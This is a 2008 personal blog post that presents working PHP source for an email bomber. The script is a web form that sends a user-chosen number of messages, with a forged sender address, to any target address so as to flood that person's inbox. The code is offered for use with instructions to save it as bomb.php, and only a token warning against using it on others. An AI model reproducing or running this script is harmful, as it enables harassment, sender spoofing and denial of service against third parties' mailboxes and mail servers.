Great Excess
Welcome to Great Excess arrow Computer arrow Internet & Technology arrow Email - Mail Bomber Send
Wednesday, 20 August 2008
 
 
English Language
Bahasa Indonesia
Computer
Website
Gallery
Health
Ebook
Tips
Movies

Visitor Data
Your IP
38.103.63.59
United States United States :
Browser
Unknown Browser Unknown Browser
Operating System
Unknown Operating System Unknown Operating System

Email - Mail Bomber Send | Print |
 

What is mail bomber?

mail bomber is flooding mail send. this also fully your inbox over 10.000 mail.

so, don't give this mail bomb to other mail.

Code of mail bomber is:


<?
if (isset($_POST['sendbomb'])) {
for ($i = 1; $i <= 5000; $i++) {
$xx = "s";
$xx .= "$i";
$$xx = $_POST[$xx];

}

/* Email for blocked from this mail boomber */
$block = " This e-mail address is being protected from spam bots, you need JavaScript enabled to view it ";

/* Check if he person is using the filtered emails */
if(!preg_match("!$block!i",$s1)) {
/* If There was no errors */
/* Set The Mailto And Subject Variables */
$MailTo = "$s2";
$MailSubject = "$s3";

/* Remove funny chars from the email so i'm doesnt go to i'm */
$s4 = stripslashes($s4);
$MailBody = "$s4";

/* Send Email Bomb !! */
for ($i = 1; $i <= $s5; $i++) {
mail($MailTo, $MailSubject, $MailBody, "From: $s1<$s1>
X-Mailer: PHP/" . phpversion());
}

/* echo out that the email bomb was sent */
echo "Mail Boomber Success";

}
else {
/* if the email was blocked give this error message */
echo "Don't Boom My Email";
}
}
else {
?>


<form action="<? echo $_SERVER['REQUEST_URI']; ?>" method="POST" class="style2">
<input type="text" name="s1" size="18">
<br>
Send To:
<br />
<input type="text" name="s2" size="18">
<br>
Subject :
<br />
<input type="text" name="s3" size="18">
<br>
Amount To Send :
<br />
<input type="text" name="s5" size="18">
<br>
Enter a Message:
<br>
<textarea name="s4" cols="50" rows="5"></textarea>
<br >
<input type="submit" value="Send Bomb" name="sendbomb">
</form>
<?
}
?>

 

Save the code on bomb.php

Don't try to other mail, please try to your else mail.

 

This entry was posted on . You can follow any responses to this entry through the RSS 2.0 feed. You can leave a comment.
Users' Comments (0)

Comment an article
  Name
  E-mail
   Title
Available characters: 600
This image contains a scrambled text, it is using a combination of colors, font size, background, angle in order to disallow computer to automate reading. You will have to reproduce it to post on my homepage
Enter what you see:

No comment posted

 
Top! Top!